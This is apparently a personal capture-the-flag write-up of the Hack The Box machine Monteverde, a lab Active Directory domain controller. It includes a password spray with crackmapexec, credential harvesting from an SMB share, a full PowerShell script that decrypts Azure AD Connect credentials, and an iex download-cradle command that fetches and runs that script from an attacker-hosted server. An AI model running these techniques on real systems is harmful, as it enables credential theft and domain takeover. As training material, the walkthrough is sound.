Monteverde AD - HackMD

> [!caution] > **Pro-Tip**: Always lookup the write-ups when you have fully tried everything and exhausted your knowledge. Basically, ensure whenever you lookup the write-ups you learn something new, not something like ‘Oh shit, i knew that, i should have tried that’ , you should be like ‘Oh thats new, great to learn this new skill, lets add it up in my arsenal of skills’.- this will eventually build up your skills and you’ll learn many new ones.** > IP address - 10.10.10.172 >> Nmap scan with minrate-1000 to see quick open port **nmap -p- --min-rate 10000 -Pn -oA nmap-alltcp 10.10.10.172** Performing an intense port scan against the open ports we found ``` ┌──(kali㉿kali)-[~/HTB] └─$ nmap -Pn -sV 10.10.10.172 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-28 18:13 EST Nmap scan report for 10.10.10.172 Host is up (0.18s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-28 23:13:48Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.95 seconds ``` > As we can see, the machine seems to be a domain controller for **megabank.local** and we have a few interesting services including **SMB** (TCP/445) and **LDAP** (TCP/389). > These are all typical Windows looking ports. Seeing TCP DNS (53) along with Kerberos (TCP 88) and LDAP (TCP 389) suggests this might be a domain controller. ### SMB Without Creds- TCP 445 > Doesn’t look like I can connect to anything on SMB without creds: ```sh ┌──(kali㉿kali)-[~/HTB] └─$ smbclient -N -L //10.10.10.172 Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌──(kali㉿kali)-[~/HTB] └─$ smbmap -H 10.10.10.172 [+] IP: 10.10.10.172:445 Name: 10.10.10.172 ``` ### RPC - TCP 445 > I am able to get a RPC session without creds: ``` ┌──(kali㉿kali)-[~/HTB] └─$ rpcclient -U "" -N 10.10.10.172 rpcclient $> querydispinfo index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE. index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null) index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null) index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null) index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null) index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null) index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null) index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null) index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null) rpcclient $> ``` > I did some looking at each use and group, but didn’t identify anything that interesting. ## Shell as mhope ### Credential Brute Force > adding the users gotten to a file to be used to check for both user and password > >[!note] > >After poking around at other things and finding very little, I came back to the usernames I had. I created a file with one user per line, and one of the things I checked was if any used their username as their password by running the following `crackmapexec`. This can be a form a password spraying, because I really only want to check one password for each user. Because my list is small and this is HTB, I’ll just try each user with each username as the password. In a real environment, I’d only want to try each user with their username: ``` ┌──(kali㉿kali)-[~/HTB] └─$ crackmapexec smb 10.10.10.172 -u Monteverde -p Monteverde --continue-on-success SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:svc-bexec STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:mhope STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:roleary STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:SABatchJobs STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:smorgan STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:svc-ata STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:svc-bexec STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\roleary:svc-netapp STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:roleary STATUS_LOGON_FAILURE SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs ``` > I got a match! The rest were fails. ### SMB with Creds - TCP 445 > `smbmap` tells me what shares there are and what I have access to (output cleaned up a bit): ``` ┌──(kali㉿kali)-[~/HTB] └─$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs [+] IP: 10.10.10.172:445 Name: 10.10.10.172 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin azure_uploads READ ONLY C$ NO ACCESS Default share E$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share users$ READ ONLY ``` > I looked through each share. I can connect with `smbclient` and poke around, or use `smbmap` to list out files. Either way, I find something interesting in the `users$` share: ``` ┌──(kali㉿kali)-[~/HTB] └─$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R 'users$' [+] IP: 10.10.10.172:445 Name: 10.10.10.172 Disk Permissions Comment ---- ----------- ------- users$ READ ONLY .\users$\* dr--r--r-- 0 Fri Jan 3 08:12:48 2020 . dr--r--r-- 0 Fri Jan 3 08:12:48 2020 .. dr--r--r-- 0 Fri Jan 3 08:15:23 2020 dgalanos dr--r--r-- 0 Fri Jan 3 08:41:18 2020 mhope dr--r--r-- 0 Fri Jan 3 08:14:56 2020 roleary dr--r--r-- 0 Fri Jan 3 08:14:28 2020 smorgan .\users$\mhope\* dr--r--r-- 0 Fri Jan 3 08:41:18 2020 . dr--r--r-- 0 Fri Jan 3 08:41:18 2020 .. fw--w--w-- 1212 Fri Jan 3 09:59:24 2020 azure.xml ``` > There’s a file at `\\10.10.10.172\mhope\azure.xml`. I’ll grab it with `smbclient`: ``` ┌──(kali㉿kali)-[~/HTB] └─$ smbclient -U SABatchJobs //10.10.10.172/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml' getting file \mhope\azure.xml of size 1212 as azure.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec) ``` > xml file gotten ``` <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T> <T>System.Object</T> </TN> <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString> <Props> <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT> <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT> <G N="KeyId">00000000-0000-0000-0000-000000000000</G> <S N="Password">4n0therD4y@n0th3r$</S> </Props> </Obj> </Objs> ``` > "Password">4n0therD4y@n0th3r$ > > checking with crackmapexec to see i we can login with the information gotten or gathetred ``` ┌──(kali㉿kali)-[~/HTB] └─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$' WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) WINRM 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!) ``` > Then login in using evil winrm ``` ┌──(kali㉿kali)-[~/HTB] └─$ evil-winrm -i 10.10.10.172 -u mhope -p 4n0therD4y@n0th3r$ 130 ⨯ Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\mhope\Documents> cd .. *Evil-WinRM* PS C:\Users\mhope> ls Directory: C:\Users\mhope Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/3/2020 5:35 AM .Azure d-r--- 1/3/2020 5:24 AM 3D Objects d-r--- 1/3/2020 5:24 AM Contacts d-r--- 1/3/2020 5:47 AM Desktop d-r--- 1/3/2020 5:24 AM Documents d-r--- 1/3/2020 5:24 AM Downloads d-r--- 1/3/2020 5:24 AM Favorites d-r--- 1/3/2020 5:24 AM Links d-r--- 1/3/2020 5:24 AM Music d-r--- 1/3/2020 5:24 AM Pictures d-r--- 1/3/2020 5:24 AM Saved Games d-r--- 1/3/2020 5:24 AM Searches d-r--- 1/3/2020 5:24 AM Videos *Evil-WinRM* PS C:\Users\mhope> cd Desktop *Evil-WinRM* PS C:\Users\mhope\Desktop> ls Directory: C:\Users\mhope\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/28/2023 2:58 PM 34 user.txt *Evil-WinRM* PS C:\Users\mhope\Desktop> cat usr.txt Cannot find path 'C:\Users\mhope\Desktop\usr.txt' because it does not exist. At line:1 char:1 + cat usr.txt + ~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\Users\mhope\Desktop\usr.txt:String) [Get-Content], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand *Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt 9f9f30bbf3fea91721901db1a649**** *Evil-WinRM* PS C:\Users\mhope\Desktop> ``` ## Priv: mhope –> administrator ### Enumeration >[!note] > >I already had a hint that this box has something with Azure Active Directory going on when I saw the `azure_uploads` share. Looking at mhope’s groups, I see `Azure Admins`: > checking the users privileges ``` *Evil-WinRM* PS C:\Users\mhope\Desktop> net user mhope User name mhope Full Name Mike Hope Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 1/2/2020 3:40:05 PM Password expires Never Password changeable 1/3/2020 3:40:05 PM Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory \\monteverde\users$\mhope Last logon 12/28/2023 3:55:34 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *Azure Admins *Domain Users The command completed successfully. ``` > user is in the Local Group Memberships of *Remote Management Use > Global Group memberships *Azure Admins > There’s a bunch of programs related to this as well: > important blog post to exploit to admin as an azure admin https://blog.xpnsec.com/azuread-connect-for-redteam/ > script to run to check for the admin username and password ```sh $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}} Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password) ``` > running the script after starting our server. > On our machine then starting our server > > **python3 -m http.server 80** > On the target > > **iex(new-object net.webclient).downloadstring('http://10.10.14.11/lmao.ps1')** > Outcome ``` *Evil-WinRM* PS C:\Program Files> iex(new-object net.webclient).downloadstring('http://10.10.14.11/lmao.ps1') Domain: MEGABANK.LOCAL Username: administrator Password: d0m@in4dminyeah! ``` > Interestingly, it gives the administrator account password. That must be the replication account here, instead of the MSOL_ account I saw in the documentation. ### Shell Over WinRM ``` ┌──(kali㉿kali)-[~/HTB] └─$ evil-winrm -i 10.10.10.172 -u administrator -p 'd0m@in4dminyeah!' 130 ⨯ Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt 9f72aa4172cfd2843c216e458fa3**** ``` #BOOM I should get food now :XD